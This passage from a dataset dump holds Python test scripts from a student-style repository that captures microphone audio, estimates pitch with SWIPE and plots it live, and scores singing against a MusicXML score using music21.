print('53',t1-t0)\n\n data = data.astype('float64')\n sound = np.roll(sound,-len(data))\n\n p = sptk.swipe(data,RATE,dt,min=50,max=500,threshold=0.3)\n t2 = time.process_time()\n # print('60',t2-t1)\n # print(len(sound))\n pitch = np.roll(pitch,-len(p))\n # print(len(p))\n # print(len(pitch))\n\n\n # print(CHUNK)\n # print(data)\n\n now = datetime.now()\n current_time = now.strftime(\"%H:%M:%S\")\n print(current_time + \" \" + str(p))\n\n\n # print(\"Pitch: \" + str(pitch))\n\n np.put(sound,range(-len(data),-1),data)\n np.put(pitch,range(-len(p),-1),p)\n t10 = time.process_time()\n # print('75',t10-t2)\n plt.figure(1)\n plt.clf()\n t3 = time.process_time()\n # print('78',t3-t10)\n plt.plot(t,sound) # plot something\n t4 = time.process_time()\n # print('81',t4-t3)\n #\n # plt.pause(0.001) # I ain't needed!!!\n # fig.canvas.draw()\n #\n plt.figure(2)\n plt.clf()\n plt.plot(tp,pitch,'.') # plot something\n\n\n plt.pause(0.005) # I ain't needed!!!\n t5 = time.process_time()\n # print('93',t5-t4)\n fig.canvas.draw()\n # print(time.process_time()-t5)\n\n\n\n # plt.figure(2)\n # plt.clf()\n # plt.plot(tp,pitch,'.')\n # plt.pause(0.005) # I ain't needed!!!\n # fig.canvas.draw()\n\n # update canvas immediately\n #plt.xlim([0, 100])\n #plt.ylim([0, 1000])\n\n # print(data)\n" }, { "alpha_fraction": 0.5483061671257019, "alphanum_fraction": 0.589962363243103, "avg_line_length": 31.933883666992188, "blob_id": "19e06443f69d11edd0b22b909282113fa07f5cb4", "content_id": "76d77e275ca80ce4761fcb352a19e81df89d8321", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3985, "license_type": "no_license", "max_line_length": 121, "num_lines": 121, "path": "/python/testpy/wpyqtgr.py", "repo_name": "yxc0103de/spektralmagi", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom pyqtgraph.Qt import QtGui, QtCore\nimport pyqtgraph as pg\n\nimport struct\nimport pyaudio\nfrom scipy.fftpack import fft\n\nimport sys\nimport time\n\nfrom pysptk.sptk import swipe\n\n\nclass AudioStream(object):\n def __init__(self):\n\n # pyqtgraph stuff\n pg.setConfigOptions(antialias=True)\n self.traces = dict()\n self.app = QtGui.QApplication(sys.argv)\n self.win = pg.GraphicsWindow(title='Spectrum Analyzer')\n self.win.setWindowTitle('Spectrum Analyzer')\n self.win.setGeometry(5, 115, 900, 500)\n\n wf_xlabels = [(0, '0'), (2048, '2048'), (4096, '4096')]\n wf_xaxis = pg.AxisItem(orientation='bottom')\n wf_xaxis.setTicks([wf_xlabels])\n\n wf_ylabels = [(0, '0'), (127, '128'), (255, '255')]\n wf_yaxis = pg.AxisItem(orientation='left')\n wf_yaxis.setTicks([wf_ylabels])\n\n sp_xlabels = [\n (np.log10(10), '10'), (np.log10(100), '100'),\n (np.log10(1000), '1000'), (np.log10(22050), '22050')\n ]\n sp_xaxis = pg.AxisItem(orientation='bottom')\n sp_xaxis.setTicks([sp_xlabels])\n\n self.waveform = self.win.addPlot(\n title='Sound', row=1, col=1, axisItems={'bottom': wf_xaxis, 'left': wf_yaxis},\n )\n self.spectrum = self.win.addPlot(\n title='Swipe', pen=None, symbol='o', row=2, col=1, axisItems={'bottom': sp_xaxis},\n )\n # self.scatter = pg.ScatterPlotItem(pen=pg.mkPen(width=5, color='r'), symbol='o', size=1)\n # self.spectrum = self.win.addItem(self.scatter)\n\n self.loop = 0.2\n # pyaudio stuff\n self.FORMAT = pyaudio.paInt16\n self.CHANNELS = 1\n self.RATE = 44100\n self.CHUNK = int(self.loop*self.RATE)\n\n self.traces['sound'] = self.waveform.plot(pen='c', width=3)\n self.waveform.setYRange(-7000, 7000, padding=0)\n self.waveform.setXRange(-10, 0, padding=0.005)\n\n symb = QtGui.QPainterPath()\n symb.addRect(QtCore.QRectF(-0.0, -0.5, 1, 1))\n # self.traces['swipe'] = self.spectrum.plot([], pen=None,\n # symbolBrush=(255,0,0), symbolSize=5, symbolPen=None)\n self.traces['swipe'] = self.spectrum.ScatterPlotItem()\n self.spectrum.setYRange(0, 700, padding=0)\n self.spectrum.setXRange(-10, 0, padding=0.005)\n\n self.p = pyaudio.PyAudio()\n self.stream = self.p.open(\n format=self.FORMAT,\n channels=self.CHANNELS,\n rate=self.RATE,\n input=True,\n output=True,\n frames_per_buffer=self.CHUNK,\n )\n # waveform and spectrum x points\n\n self.t = np.linspace(-10,0,num=10*self.RATE)\n self.sound = np.zeros(10*self.RATE)\n self.dt = int(self.loop/10*self.RATE)\n self.pitch = np.zeros(int(10/self.dt*self.RATE))\n self.tp = np.linspace(-10,0,num=len(self.pitch))\n\n def start(self):\n if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):\n QtGui.QApplication.instance().exec_()\n\n def set_plotdata(self):\n self.traces['sound'].setData(self.t, self.sound)\n # self.traces['swipe'].setData(self.tp, self.pitch)\n self.traces['swipe'].setData(self.tp,self.pitch)\n\n def update(self):\n\n data = np.array(struct.unpack(str(self.CHUNK) + 'h', self.stream.read(self.CHUNK,exception_on_overflow = False)))\n data = data.astype('float64')\n self.sound = np.roll(self.sound,-len(data))\n\n sw = swipe(data,self.RATE,self.dt,min=40,max=700,threshold=0.25)\n\n self.pitch = np.roll(self.pitch,-len(sw))\n\n np.put(self.sound,range(-len(data),-1),data)\n np.put(self.pitch,range(-len(sw),-1),sw)\n\n self.set_plotdata()\n\n\n def animation(self):\n timer = QtCore.QTimer()\n timer.timeout.connect(self.update)\n timer.start(self.loop*1000)\n self.start()\n\n\nif __name__ == '__main__':\n\n audio_app = AudioStream()\n audio_app.animation()\n" }, { "alpha_fraction": 0.5348691344261169, "alphanum_fraction": 0.5557122826576233, "avg_line_length": 30.74626922607422, "blob_id": "81f6e3ec5c6c810e177b7ac5cf1a7a5f4dacef40", "content_id": "9ad1d1a250e469d9e30201b34d690c3bcbb4760a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6381, "license_type": "no_license", "max_line_length": 90, "num_lines": 201, "path": "/python/test4_wgrid.py", "repo_name": "yxc0103de/spektralmagi", "src_encoding": "UTF-8", "text": "# plotting\nfrom PyQt5 import QtCore, QtWidgets\nimport pyqtgraph as pg\n\n#\n#import struct\nimport pyaudio\nimport sys\nimport time\n\nimport multiprocessing as mp\nimport queue\n\nfrom pysptk.sptk import swipe\nimport numpy as np\nimport math\n\nclass RTSwipe:\n def __init__(self,RATE=44800,CHUNK=6000,minfreq=50,maxfreq=1500,threshold=0.25):\n self.minfreq=minfreq\n self.maxfreq=maxfreq\n self.threshold=threshold\n\n\n\n CHANNELS = 1\n self.RATE = RATE\n self.CHUNK = CHUNK#2*2048\n self.swipesPerChunk = math.floor(CHUNK/(RATE*0.02)) # 20 ms per swipe estimate\n FORMAT = pyaudio.paInt16\n self.cnt = 0\n tsave = 10\n\n self.t0 = time.time()\n self.t = self.t0\n\n self.sound = mp.Queue()\n self.times = mp.Queue()\n self.swipes = mp.Queue()\n self.shutDown = mp.Queue()\n\n self.audio= pyaudio.PyAudio()\n self.stream = self.audio.open(\n format=FORMAT,\n channels=CHANNELS,\n rate=self.RATE,\n input=True,\n output=False,\n stream_callback=self.audioCallback,\n frames_per_buffer=self.CHUNK\n )\n self.process = mp.Process(target=self.swipeSound)\n self.process.start()\n\n print(\"Process started\")\n\n def audioCallback(self, in_data, frame_count, time_info, status):\n #print('in callback')\n sound = np.frombuffer(in_data,dtype=np.int16)\n times = np.linspace(self.t-self.t0,time.time()-self.t0,\n self.swipesPerChunk,True)\n self.t = time.time()\n self.sound.put(sound)\n self.times.put(times)\n #print(\"Sound len: \" + str(len(sound)))\n return(in_data,pyaudio.paContinue)\n\n def swipeSound(self):\n while True:\n if not self.shutDown.empty():\n break\n try:\n data = self.sound.get_nowait()\n except queue.Empty:\n #print('queue empty')\n time.sleep(0.04)\n else:\n #print(self.sound.empty())\n # self.cnt = 0\n #print('Data length: ', len(data))\n data = data.astype('float64')\n #print(len(data))\n t0 = time.perf_counter()\n sw = swipe(data, self.RATE, int(self.CHUNK/self.swipesPerChunk),\n min=self.minfreq, max=self.maxfreq,\n threshold=self.threshold)\n #print('swipe time: ', time.perf_counter()-t0)\n self.swipes.put(sw)\n #print('swipe length: ', len(sw))\n return True\n\n\n def getSwipes(self):\n if not self.swipes.empty():\n swipes = self.swipes.get_nowait()\n times = self.times.get_nowait()\n newSwipes = []\n newTimes = []\n for i in range(0,len(swipes)):\n if swipes[i] > 0:\n newSwipes.append(np.log(swipes[i])/np.log(2**(1/12)))\n newTimes.append(times[i])\n return newSwipes, newTimes\n return [], []\n\n def exitHandler(self):\n print('in exit')\n self.audio.close(self.stream)\n self.shutDown.put(True)\n self.process.join()\n\nclass RollWindow(pg.GraphicsWindow):\n def __init__(self,sweeper,parent=None,updateInterval=20,timeWindow=10):\n super().__init__(parent=parent)\n self.sweeper = sweeper\n self.updateInterval = updateInterval\n self.timeWindow = timeWindow\n self.t0 = time.time()\n self.t = 0\n self.mainLayout = QtWidgets.QVBoxLayout()\n self.setLayout(self.mainLayout)\n\n self.swipes = []\n self.times = []\n\n self.timer = QtCore.QTimer(self)\n self.timer.setInterval(updateInterval) # in milliseconds\n self.timer.start()\n self.timer.timeout.connect(self.update)\n\n self.plotSwipe = self.addPlot(title=\"Swipe pitch estimates\")\n # self.plotSwipe.setLogMode(x=False,y=True)\n\n min_freq = np.log(80)/np.log(2**(1/12))\n max_freq = np.log(800)/np.log(2**(1/12))\n\n self.plotSwipe.setYRange(min_freq, max_freq, padding=0)\n\n self.plot_swipe_item = self.plotSwipe.plot([], pen=None,\n symbolBrush=(255,0,0), symbolSize=5, symbolPen=None)\n\n r2 = pg.QtGui.QGraphicsRectItem(5, 1, 6, 3.2)\n r2.setPen(pg.mkPen((0, 0, 0, 100)))\n r2.setBrush(pg.mkBrush((50, 50, 200)))\n self.plotSwipe.showGrid(True,True)\n\n\n\n ay = self.plotSwipe.getAxis('left')\n dy = [(value+0.5, str(value+0.5)) for value in range(int(min_freq),int(max_freq))]\n ay.setTicks([dy, []])\n self.ax = self.plotSwipe.getAxis('bottom')\n\n self.plotSwipe.addItem(r2)\n self.ticks = np.arange(self.t-self.timeWindow/2,\n self.t+self.timeWindow/2,0.75)\n\n\n def update(self):\n self.plotSwipe.setXRange(self.t-self.timeWindow/2,\n self.t+self.timeWindow/2, padding=0)\n\n if self.t+self.timeWindow/2 > max(self.ticks):\n self.ticks = np.roll(self.ticks,-1)\n np.put(self.ticks,-1,max(self.ticks)+0.75)\n dx = [(val, str(int(val/0.75))) for val in self.ticks]\n self.ax.setTicks([dx,[]])\n\n newSwipes, newTimes = self.sweeper.getSwipes()\n self.swipes += newSwipes\n self.times += newTimes\n\n\n if len(self.swipes) > 0:\n self.plot_swipe_item.setData(self.times,self.swipes)\n # try:\n # data, tp = self.sweeper.getPitches().get_nowait()\n # except queue.Empty:\n # print('no swipes')\n # else:\n # self.pitch = np.roll(self.pitch,-len(data))\n # np.put(self.pitch,range(-len(data),-1),data)\n # t0 = time.perf_counter()\n # self.plot_swipe_item.setData(self.tp,np.log10(self.pitch))\n # print('plot time: ', time.perf_counter()-t0)\n self.t = time.time()-self.t0\n\n\ndef main():\n app = QtWidgets.QApplication([])\n pg.setConfigOptions(antialias=False) # True seems to work as well\n\n sweeper = RTSwipe()\n rollWindow = RollWindow(sweeper,updateInterval=40)\n app.aboutToQuit.connect(sweeper.exitHandler)\n rollWindow.show()\n rollWindow.raise_()\n app.exec_()\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.6794871687889099, "alphanum_fraction": 0.7019230723381042, "avg_line_length": 21.35714340209961, "blob_id": "6052437f0427729ed45480f9abe06f1be11e38e9", "content_id": "d143a68a01b144bc0637e440777fa86c70cd74de", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 312, "license_type": "no_license", "max_line_length": 71, "num_lines": 14, "path": "/erik/testingtesting.py", "repo_name": "yxc0103de/spektralmagi", "src_encoding": "UTF-8", "text": "from music21 import *\npiece = converter.parse(\"Vem_kan_segla.musicxml\")\n\n#print(piece.flat.tempo)\n\n#for e in piece.flat.elements:\n #print(e)\n\n#print(piece.flat.getElementsByClass(meter.TimeSignature)[0].numerator)\n\nfor i in range(40, 60, True):\n p = pitch.Pitch()\n p.midi = i\n print(p.nameWithOctave)" }, { "alpha_fraction": 0.574280321598053, "alphanum_fraction": 0.5898298025131226, "avg_line_length": 30.516555786132812, "blob_id": "9f1936c2c61b3b43605d7bb625e5c5058c0df99c", "content_id": "ca954280294d0db3ff0a59d6d4ebb0b3b8a0c495", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4759, "license_type": "no_license", "max_line_length": 131, "num_lines": 151, "path": "/python/testpy/scat_w_callback.py", "repo_name": "yxc0103de/spektralmagi", "src_encoding": "UTF-8", "text": "from PyQt5 import QtCore, QtWidgets\nimport pyqtgraph as pg\nimport numpy as np\n\nimport struct\nimport pyaudio\nimport sys\nimport time\n\nfrom pysptk.sptk import swipe\n\n# win = None\n# app = None\n\n\nclass MyWidget(pg.GraphicsWindow):\n\n def __init__(self, parent=None):\n super().__init__(parent=parent)\n\n loop = 0.2\n # pyaudio stuff\n FORMAT = pyaudio.paInt16\n CHANNELS = 1\n self.RATE = 44100\n self.CHUNK = int(loop*self.RATE)\n\n p = pyaudio.PyAudio()\n self.stream = p.open(\n format=FORMAT,\n channels=CHANNELS,\n rate=self.RATE,\n input=True,\n output=True,\n #stream_callback=self.audio_callback,\n frames_per_buffer=self.CHUNK\n )\n\n nbr_pitch = 10\n nbr_sec = 10\n self.t = np.linspace(-nbr_sec,0,num=nbr_sec*self.RATE)\n self.sound = np.zeros(10*self.RATE)\n self.dt = int(loop/nbr_sec*self.RATE)\n self.pitch = np.zeros(int(nbr_pitch/self.dt*self.RATE))\n self.tp = np.linspace(-nbr_sec,0,num=len(self.pitch))\n\n self.mainLayout = QtWidgets.QVBoxLayout()\n self.setLayout(self.mainLayout)\n\n self.timer = QtCore.QTimer(self)\n self.timer.setInterval(loop*1000) # in milliseconds\n self.timer.start()\n self.timer.timeout.connect(self.onNewData)\n\n self.plotSwipe = self.addPlot(title=\"Swipe pitch estimates\", row=1, col=0)\n self.plotSound = self.addPlot(title=\"Sound\", row=0, col=0)\n\n # print(self.plotSwipe.getViewBox())\n\n self.plotDataItem = self.plotSwipe.plot([], pen=None,\n symbolBrush=(255,0,0), symbolSize=5, symbolPen=None)\n self.plotSoundData = self.plotSound.plot()\n\n self.t0 = time.process_time()\n self.tcallb = time.process_time()\n\n def audio_callback(self, in_data, frame_count, time_info, status):\n\n # print('callb period: ', time.process_time() - self.tcallb) #this print fucks things up sometimes..\n self.tcallb = time.process_time()\n audio_data = np.frombuffer(in_data, dtype=np.int16)\n audio_data = audio_data.astype('float16')\n # print(audio_data)\n self.sound = np.roll(self.sound,-len(audio_data))\n np.put(self.sound,range(-len(audio_data),-1),audio_data)\n\n # print('in_data: ',len(in_data))\n # print('audio_data: ', len(audio_data))\n return(in_data,pyaudio.paContinue)\n\n #np.array(struct.unpack(str(self.CHUNK) + 'h', self.stream.read(self.CHUNK))\n\n def onNewData(self):\n tp = time.process_time()-self.t0\n self.t0 = time.process_time()\n print('tp: ', tp)\n # try:\n # data = np.array(struct.unpack(str(self.CHUNK) + 'h', self.stream.read(self.CHUNK)))#,exception_on_overflow = False)))\n #\n # except:\n # data = np.take(self.sound,range(-self.CHUNK,-1))\n # #data = np.array(struct.unpack(str(self.CHUNK) + 'h', self.stream.read(self.CHUNK,exception_on_overflow = False)))\n # print('overflow')\n # data = data.astype('float64')\n # print(len(data))\n # self.sound = np.roll(self.sound,-len(data))\n #\n data = np.array(struct.unpack(str(self.CHUNK) + 'h', self.stream.read(self.CHUNK,exception_on_overflow = False)))\n data = data.astype('float64')\n self.sound = np.roll(self.sound,-len(data))\n np.put(self.sound,range(-len(data),-1),data)\n # data = self.sound[range(-int(tp*self.RATE),-1)]\n\n # print(-int(tp/self.RATE))\n # print(len(data))\n # print(len(self.sound))\n # print('len data: ', len(data))\n\n t1 = time.process_time()\n sw = swipe(data,self.RATE,self.dt,min=40,max=1000,threshold=0.25)\n # print('swipe time: ', time.process_time()-t1)\n # print(time.process_time()-t1)\n\n self.pitch = np.roll(self.pitch,-len(sw))\n\n np.put(self.pitch,range(-len(sw),-1),sw)\n\n t3 = time.process_time()\n self.plotDataItem.setData(self.tp, self.pitch)\n t4 = time.process_time()\n # print('plot pitch: ', t4-t3)\n self.plotSoundData.setData(self.t, self.sound)\n # print('plot sound: ',time.process_time()-t4)\n\n\ndef main():\n # global win, app\n app = QtWidgets.QApplication([])\n\n pg.setConfigOptions(antialias=False) # True seems to work as well\n\n win = MyWidget()\n app.aboutToQuit.connect(myExitHandler)\n win.show()\n # win.resize(800,600)\n win.raise_()\n app.exec_()\n\ndef myExitHandler():\n # global win, app\n time.sleep(0.2)\n # app = None\n # print(win.plotSwipe.getViewBox())\n # win.plotSwipe.clear()\n # win.plotSound.clear()\n # print('cleared')\n\n # del win\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.5663390755653381, "alphanum_fraction": 0.5933660864830017, "avg_line_length": 19.871795654296875, "blob_id": "db0d9f07cbb99ee8cdf13b92b3ce83260ca28a83", "content_id": "280e1b68252c234c5725543cec5a0edfaa2896ee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1628, "license_type": "no_license", "max_line_length": 62, "num_lines": 78, "path": "/python/testpy/test.py", "repo_name": "yxc0103de/spektralmagi", "src_encoding": "UTF-8", "text": "#! /usr/local/bin/python\n\nimport pyaudio\nimport struct\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport time\n\nimport crepe\n\n\nCHUNK = 4000\nFORMAT = pyaudio.paInt16\nCHANNELS = 1\nRATE = 16000\n\nx = range(1, 100)\nplt.plot(x)\nplt.show()\n\np = pyaudio.PyAudio()\n\nchosen_device_index = -1\nfor x in range(0, p.get_device_count()):\n info = p.get_device_info_by_index(x)\n # print p.get_device_info_by_index(x)\n if info[\"name\"] == \"pulse\":\n chosen_device_index = info[\"index\"]\n print(\"Chosen index: \", chosen_device_index)\n\n\nstream = p.open(format=FORMAT,\n channels=CHANNELS,\n rate=RATE,\n input_device_index=chosen_device_index,\n input=True,\n output=True,\n frames_per_buffer=CHUNK\n )\n\nplt.ion()\nfig, ax = plt.subplots()\n\nx = np.arange(0, CHUNK)\ndata = stream.read(CHUNK)\ndata_int16 = struct.unpack(str(CHUNK) + 'h', data)\nline, = ax.plot(x, data_int16)\n# ax.set_xlim([xmin,xmax])\nax.set_ylim([-2**15, (2**15) - 1])\n\n# fig = plt.gcf()\n# fig.show()\n# fig.canvas.draw()\n\ndata = struct.unpack(str(CHUNK) + 'h', stream.read(CHUNK))\nplt.plot()\n\nwhile True:\n # for i in range(500)\n data = struct.unpack(str(CHUNK) + 'h', stream.read(CHUNK))\n # line.set_ydata(data)\n # fig.canvas.draw()\n # fig.show()\n # fig.canvas.flush_events()\n\n print(data)\n x = range(len(data))\n\n plt.plot(x, data) # plot something\n plt.show()\n\n # update canvas immediately\n # plt.xlim([0, 100])\n # plt.ylim([0, 100])\n # plt.pause(0.01) # I ain't needed!!!\n # fig.canvas.draw()\n\nplt.plot(data)\n" }, { "alpha_fraction": 0.6130081415176392, "alphanum_fraction": 0.6520324945449829, "avg_line_length": 20.964284896850586, "blob_id": "99f64e81961812bbb51d680c5f7ecbba21f8e465", "content_id": "1851ae0bc1b9f05676baf52b8632b140df8f8f09", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 615, "license_type": "no_license", "max_line_length": 54, "num_lines": 28, "path": "/python/testpy/testpygtgr.py", "repo_name": "yxc0103de/spektralmagi", "src_encoding": "UTF-8", "text": "import pyqtgraph as pg\nimport numpy as np\nimport time\n\nplt = pg.plot()\nbufferSize = 1000\ndata = np.zeros(bufferSize)\ncurve = plt.plot()\nline = plt.addLine(x=0)\nplt.setRange(xRange=[0, bufferSize], yRange=[-50, 50])\ni = 0\ndef update():\n global data, curve, line, i\n n = 10 # update 10 samples per iteration\n rand = np.random.normal(size=n)\n data[i:i+n] = np.clip(data[i-1] + rand, -50, 50)\n curve.setData(data)\n i = (i+n) % bufferSize\n line.setValue(i)\n\ntimer = pg.QtCore.QTimer()\ntimer.timeout.connect(update)\ntimer.start(20)\n\nwhile True:\n update()\n time.sleep(0.5)\n print('running')\n" }, { "alpha_fraction": 0.529344916343689, "alphanum_fraction": 0.5476905703544617, "avg_line_length": 33.40782165527344, "blob_id": "220dc0ec1b1aca033fc96b2d37ebe1a72db3161f", "content_id": "7e56affd4c2db3d096af735fc46654a5eafe2787", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12322, "license_type": "no_license", "max_line_length": 126, "num_lines": 358, "path": "/python/testpy/test7.py", "repo_name": "yxc0103de/spektralmagi", "src_encoding": "UTF-8", "text": "\nimport sys\nimport time\nimport multiprocessing as mp\nimport queue\nfrom music21 import *\n\nimport math\nimport numpy as np\n\n# import music21\nimport pyaudio\nfrom pysptk.sptk import swipe\n\nfrom PyQt5 import QtCore, QtWidgets, QtGui\nimport pyqtgraph as pg\n\nglobal BASE\nBASE = np.log(2**(1 / 12))\n\n\nclass RTSwipe:\n def __init__(self, RATE=48000, CHUNK=6000, minfreq=50,\n maxfreq=1500, threshold=0.25):\n self.minfreq = minfreq\n self.maxfreq = maxfreq\n self.threshold = threshold\n\n # CHANNELS = 1\n self.RATE = RATE\n self.CHUNK = CHUNK # 2*2048\n self.swipesPerChunk = math.floor(\n CHUNK / (RATE * 0.02)) # 20 ms per swipe estimate\n # FORMAT = pyaudio.paInt16\n self.cnt = 0\n\n # self.t0 = time.time()\n # self.t = self.t0\n\n self.sound = mp.Queue()\n self.times = mp.Queue()\n self.swipes = mp.Queue()\n self.shutDown = mp.Queue()\n\n self.running = False\n\n def start_swipe(self, t):\n self.audio = pyaudio.PyAudio()\n CHANNELS = 1\n FORMAT = pyaudio.paInt16\n self.t0 = t\n self.t = self.t0\n self.stream = self.audio.open(\n format=FORMAT,\n channels=CHANNELS,\n rate=self.RATE,\n input=True,\n output=False,\n stream_callback=self.audioCallback,\n frames_per_buffer=self.CHUNK\n )\n self.process = mp.Process(target=self.swipeSound)\n self.process.start()\n self.running = True\n\n print(\"Process started\")\n\n def set_time(self, t):\n self.t0 = t\n self.t = self.t0\n\n def audioCallback(self, in_data, frame_count, time_info, status):\n sound = np.frombuffer(in_data, dtype=np.int16)\n times = np.linspace(self.t - self.t0, time.time() - self.t0,\n self.swipesPerChunk, True)\n self.t = time.time()\n self.sound.put(sound)\n self.times.put(times)\n return(in_data, pyaudio.paContinue)\n\n def swipeSound(self):\n while True:\n if not self.shutDown.empty():\n break\n try:\n data = self.sound.get_nowait()\n except queue.Empty:\n\n time.sleep(0.04)\n else:\n data = data.astype('float64')\n sw = swipe(data, self.RATE,\n int(self.CHUNK / self.swipesPerChunk),\n min=self.minfreq, max=self.maxfreq,\n threshold=self.threshold)\n self.swipes.put(sw)\n return True\n\n def getSwipes(self):\n if not self.swipes.empty():\n swipes = self.swipes.get_nowait()\n times = self.times.get_nowait()\n newSwipes = []\n newTimes = []\n for i in range(0, len(swipes)):\n if swipes[i] > 0:\n newSwipes.append(\n np.log(swipes[i] / 8.17578) / BASE + 1 / 2)\n newTimes.append(times[i])\n return newSwipes, newTimes\n return [], []\n\n def exitHandler(self):\n print('in exit')\n self.audio.close(self.stream)\n self.shutDown.put(True)\n self.process.join()\n\n\nclass NotesWizard:\n def __init__(self, filePath):\n self.piece = converter.parse(filePath)\n\n self.timeSig = (self.piece.flat.\n getElementsByClass(meter.TimeSignature)[0].numerator)\n self.tempo = (self.piece.flat.\n getElementsByClass(tempo.MetronomeMark)[0].number)\n\n midimax = 0\n midimin = 9999\n t = 0\n for e in self.piece.flat.notesAndRests:\n setattr(e, \"time\", t)\n setattr(e, \"globBeat\", e.measureNumber + e.beat - 2)\n if e.isNote:\n midimax = max(midimax, e.pitch.midi)\n midimin = min(midimin, e.pitch.midi)\n rect = pg.QtGui.QGraphicsRectItem(t, e.pitch.midi - 1 / 2,\n e.seconds, 2**(1 / 12))\n rect.setPen(pg.mkPen((0, 0, 0, 100)))\n rect.setBrush(pg.mkBrush((127, 127, 127)))\n setattr(e, \"rect\", rect)\n setattr(e, 'nbr_hits', 0)\n setattr(e, 'nbr_tries', 0)\n setattr(e, 'ratio', 0.5)\n\n t += e.seconds\n\n def getNotesAndRests(self):\n return self.piece.flat.notesAndRests\n\n def getTimeSig(self):\n return self.timeSig\n\n def getTempo(self):\n return self.tempo\n\n\nclass RollWindow(pg.GraphicsWindow):\n def __init__(self, sweeper, notesWizard, parent=None, updateInterval=20,\n timeWindow=10):\n super().__init__(parent=parent)\n self.notesWizard = notesWizard\n self.sweeper = sweeper\n self.updateInterval = updateInterval\n self.timeWindow = timeWindow\n self.t = 0\n\n lay = self.ci.layout\n lay.setRowStretchFactor(0, 1)\n lay.setRowStretchFactor(1, 10)\n\n btn_layout = QtWidgets.QHBoxLayout()\n start_button = QtGui.QPushButton(\"Start\")\n re_button = QtGui.QPushButton(\"Restart\")\n quit_button = QtGui.QPushButton(\"Quit\")\n start_button.clicked.connect(self.start_pressed)\n re_button.clicked.connect(self.restart_pressed)\n quit_button.clicked.connect(self.quit_pressed)\n\n self.score_brd = QtWidgets.QLabel()\n self.score_brd.setAlignment(QtCore.Qt.AlignCenter)\n font = QtGui.QFont()\n font.setBold(True)\n font.setPointSize(25)\n self.score_brd.setFont(font)\n self.score_brd.setText('Score: 0.00')\n\n btn_layout.addWidget(start_button)\n # btn_layout.addWidget(re_button)\n # btn_layout.addWidget(quit_button)\n btn_layout.addWidget(self.score_brd)\n\n self.swipes = []\n self.times = []\n\n self.timer = QtCore.QTimer(self)\n self.timer.setInterval(updateInterval) # in milliseconds\n # self.timer.start()\n self.timer.timeout.connect(self.update)\n\n timeSig = notesWizard.getTimeSig()\n tempo = notesWizard.getTempo()\n\n # self.plotSwipe = self.addPlot(row=1,col=0,title=\"Swipe pitch estimates\")\n self.plotSwipe = pg.PlotWidget(title=\"Swipe pitch estimates\")\n self.plotSwipe.setYRange(36, 83, padding=0)\n self.plotSwipe.setXRange(-timeWindow / 2, timeWindow / 2, padding=0)\n\n self.xAxisSwipe = self.plotSwipe.getAxis(\"bottom\")\n self.xAxisSwipe.setTickSpacing(\n major=60 / tempo * timeSig, minor=60 / tempo)\n self.yAxisSwipe = self.plotSwipe.getAxis(\"left\")\n self.rightAxisSwipe = self.plotSwipe.getAxis(\"right\")\n self.rightAxisSwipe.setTickSpacing(levels=[(12, -0.5), (1, -0.5)])\n\n majorTicks = []\n minorTicks = []\n for i in range(0, 127):\n p = pitch.Pitch()\n p.midi = i\n if i % 12 == 0:\n majorTicks.append((i - 1 / 2, p.nameWithOctave))\n minorTicks.append((i - 1 / 2, p.nameWithOctave))\n self.yAxisSwipe.setTicks([majorTicks, minorTicks])\n self.plotSwipe.showGrid(x=True, y=True, alpha=0.5)\n self.yAxisSwipe.setTickSpacing(levels=[(12, -0.5), (1, -0.5)])\n\n # Notes\n for e in notesWizard.getNotesAndRests():\n if e.isNote:\n self.plotSwipe.addItem(e.rect)\n # Swipe estimates\n self.plot_swipe_item = self.plotSwipe.plot([], pen=None,\n symbolBrush=(255, 255, 255),\n symbolSize=5,\n symbolPen=None)\n # Now line\n self.nowLine = pg.InfiniteLine(0, 90)\n self.plotSwipe.addItem(self.nowLine)\n\n # self.notes_iter = self.notesWizard.getNotesAndRests()\n self.notes_iter = self.notesWizard.piece.flat.notes\n self.current_note = next(self.notes_iter)\n self.notes_done = False\n self.score = 0\n self.total_swipes = 0\n vbox = QtWidgets.QVBoxLayout()\n vbox.addItem(btn_layout)\n vbox.addWidget(self.plotSwipe)\n self.setLayout(vbox)\n\n def quit_pressed(self):\n return True\n\n def restart_pressed(self):\n return True\n\n def start_pressed(self):\n self.cd = 4\n self.cd_timer = QtCore.QTimer(self)\n self.cd_timer.setInterval(\n 60 / self.notesWizard.tempo * 1000) # in milliseconds\n self.cd_timer.timeout.connect(self.count_down)\n self.t0 = time.perf_counter()\n self.cd_timer.start()\n\n def start_app(self):\n self.score_brd.setText(\"Score: 0.00\")\n self.t0 = time.time()\n if not self.timer.isActive():\n print('start')\n self.sweeper.start_swipe(self.t0)\n self.timer.start()\n else:\n self.sweeper.set_time(self.t0)\n\n def count_down(self):\n # print(time.perf_counter() - self.t0)\n self.t0 = time.perf_counter()\n self.cd += -1\n self.score_brd.setText(str(self.cd))\n if self.cd == 0:\n self.cd_timer.stop()\n self.start_app()\n\n def update_score(self):\n if self.current_note.isNote:\n prev_hits = self.score * self.total_swipes\n self.total_swipes += (self.current_note.seconds *\n self.sweeper.swipesPerChunk *\n self.sweeper.RATE / self.sweeper.CHUNK)\n self.score = ((prev_hits + self.current_note.nbr_hits)\n / self.total_swipes)\n score_str = 'Score: ' + str(round(self.score, 2))\n self.score_brd.setStyleSheet('QLabel { color:rgb(' +\n str(int(255 * (1 - self.score))) + ',' +\n str(int(255 * self.score)) + ',0);}')\n self.score_brd.setText(score_str)\n\n # swipes = (self.current_note.seconds*self.sweeper.swipesPerChunk*\n # self.sweeper.RATE/self.sweeper.CHUNK)\n # self.score += self.current_note.nbr_hits/swipes\n # print(self.score)\n\n def set_current(self, time):\n\n if (time >= (self.current_note.time + self.current_note.seconds) and\n not self.notes_done):\n self.update_score()\n try:\n self.current_note = next(self.notes_iter)\n except 